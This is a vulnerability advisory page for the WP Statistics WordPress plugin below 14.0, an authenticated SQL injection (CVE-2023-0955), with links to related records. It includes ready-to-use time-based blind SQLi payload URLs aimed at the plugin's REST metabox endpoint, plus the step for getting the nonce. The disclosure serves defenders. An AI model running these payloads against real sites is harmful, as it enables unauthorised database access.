Lucene search
WpvulndbWPEX-ID:18B7E93F-B038-4F28-918B-4015D62F0EB8HistoryMar 06, 2023 - 12:00 a.m.
WP Statistics < 14.0 - Authenticated SQLi
2023-03-0600:00:00
wpvulndb
88
sql injection
authenticated user
wp statistics
delay
security exploit
nonce
admin-ajax url
EPSS
0.001
Percentile
31.1%
The plugin does not escape a parameter, which could allow authenticated users to perform SQL Injection attacks. By default, the affected feature is available to users with the manage_options capability (admin+), however the plugin has a settings to allow low privilege users to access it as well.
Log in as a user allowed to View WP Statistic (by default admins, but this can be changed in Statistic > Settings > Roles) and get a nonce via https://a.com/wp-admin/admin-ajax.php?action=rest-nonce, and use it in the URLs below, which will result in a 6s delay
https://a.com/wp-json/wp-statistics/v2/metabox?_wpnonce=XXXX&name=pages-chart&ago=1&type=a%27%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(2)))Ab)--%20Cd
https://a.com/wp-json/wp-statistics/v2/metabox?_wpnonce=XXXX&name=pages-chart&ago=1&ID=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(2)))Ab)--%20CdRelated
prion
prion
Sql injection
2023-03-27 16:15:00
cve
cve
CVE-2023-0955
2023-03-27 16:15:09
nvd
nvd
CVE-2023-0955
2023-03-27 16:15:09
osv
osv
CVE-2023-0955
2023-03-27 16:15:09
cvelist
cvelist
CVE-2023-0955 WP Statistics < 14.0 - Authenticated SQLi
2023-03-27 15:37:29
wpvulndb
wpvulndb
WP Statistics < 14.0 - Authenticated SQLi
2023-03-06 00:00:00
openvas
openvas
WordPress WP Statistics Plugin < 13.2.11 Multiple SQLi Vulnerabilities
2023-03-10 00:00:00
wordfence
wordfence